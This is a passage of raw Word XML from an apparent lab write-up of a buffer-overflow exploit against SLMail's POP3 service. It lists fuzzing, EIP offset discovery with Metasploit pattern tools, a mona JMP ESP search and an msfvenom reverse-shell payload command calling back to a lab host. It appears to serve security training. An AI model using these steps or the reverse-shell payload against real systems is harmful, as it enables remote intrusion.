      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> crash this application. Here are the screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22BA69" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA05B2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEA70DF" wp14:editId="02F92988">
            <wp:extent cx="6438900" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture 2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whiteboard&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6438900" cy="3448050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05560F1C" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="006208A8" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This screenshot show us that the application is crashed and could not execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>anymore.The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> EIP is overwritten by 41’s which the numerical value of “A” in ASCCI characters. EIP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA05B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> 41414141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E6B27" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 newfuzzing.py 192.168.56.144 110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB1AA08" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA05B2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BBAE61A" wp14:editId="3C1A46EB">
            <wp:extent cx="594360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6440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4E034" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="006208A8" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006208A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Number of the bytes that were able to crash program are 2700bytes since it is where the last successful login occurred. We can confirm this by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Generating unique pattern of length of 2700 using the ruby script that exists in the Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAA08ED" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00C532E9" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825445D" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="571F7D30" wp14:editId="6E126FC7">
            <wp:extent cx="5943600" cy="1592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2580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC7C94" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Let us Modify our fuzzing script. replace the A by our unique pattern. After modifying the script, we have sent the script to the victim machine again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6203F69B" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Add the above pattern in the script then send the pattern to the victim machi</w:t>
      </w:r>
      <w:r w:rsidRPr="00F154A0">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54572139" wp14:editId="2DA27255">
            <wp:extent cx="5943600" cy="24104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0460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D188507" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77730">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C08EC90" wp14:editId="0D68274F">
            <wp:extent cx="5943600" cy="2776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6220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B44CE3" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>EIP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77730">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77730">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>39694438</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF67728" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The Value of the EIP is overwritten after sending the script contains the pattern of the length 2700. We can use this EIP value to get the offset </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D461971" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77730">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>python2 pattern.py 192.168.56.144 110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554ACAB5" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00C532E9" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Locate the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> ruby</w:t>
      </w:r>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> script in the kali to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">find the offset value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>by running the below command we have gotten the offset value, that is the exact match number of the bytes that are able to crash Slmail.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314F669C" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2034E1" w14:textId="77777777" w:rsidR="000F062F" w:rsidRPr="00F77730" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C532E9">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44997D25" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="00CE14B1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FB8B0C0" wp14:editId="1B61B8A7">
            <wp:extent cx="5943600" cy="92265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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="922655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62D360" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t xml:space="preserve">The above screenshot shows the offset </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>value ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> let us find the actual address value of the ESP using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell that can be found from the ruby script.The address of the esp is found to be FFE4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D53E909" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="0043072B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EF59EBC" wp14:editId="7FD75162">
            <wp:extent cx="5943600" cy="7880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943600" cy="788035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FCBF9" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r w:rsidRPr="0043072B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025A1A8F" wp14:editId="55B9A076">
            <wp:extent cx="5943600"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1280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0D0CB" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:r>
        <w:t xml:space="preserve">With the help of mona.py script we can get </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">the  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> modules for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>slmail</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20B6E493" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13654">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!mona</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B13654">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> find -s "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B13654">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B13654">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\xe4" -m slmfc.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B934D" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075642C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Inside the immunity Debugger command interface type in the above command. As per the above screenshot, we can find the 19 pointers contains </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0075642C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0075642C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> module of the slmfc. Let us use the first one inside our exploit together with the shellcode that will be generated in the following step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FEB7C7" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DD4015" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Let us generate our reverse shellcode by using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0075642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0075642C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20F049F6" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01EA8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4DB7C5" wp14:editId="398FD66F">
            <wp:extent cx="5943600" cy="2362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2835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D521E3C" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D01EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D01EA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=443 -f py -b '\x00\x0a\x0d\' -e x86/shikata_ga_nai -o shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125EC2A9" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Let us cat the shellcode file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585E7F38" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D01EA8">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E22404E" wp14:editId="6309E453">
            <wp:extent cx="5943600" cy="3498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8215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C437F87" w14:textId="77777777" w:rsidR="000F062F" w:rsidRDefault="000F062F" w:rsidP="000F062F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Let us modify the script by adding the new generated shellcode.</w:t>
      </w:r>
    </w:p>
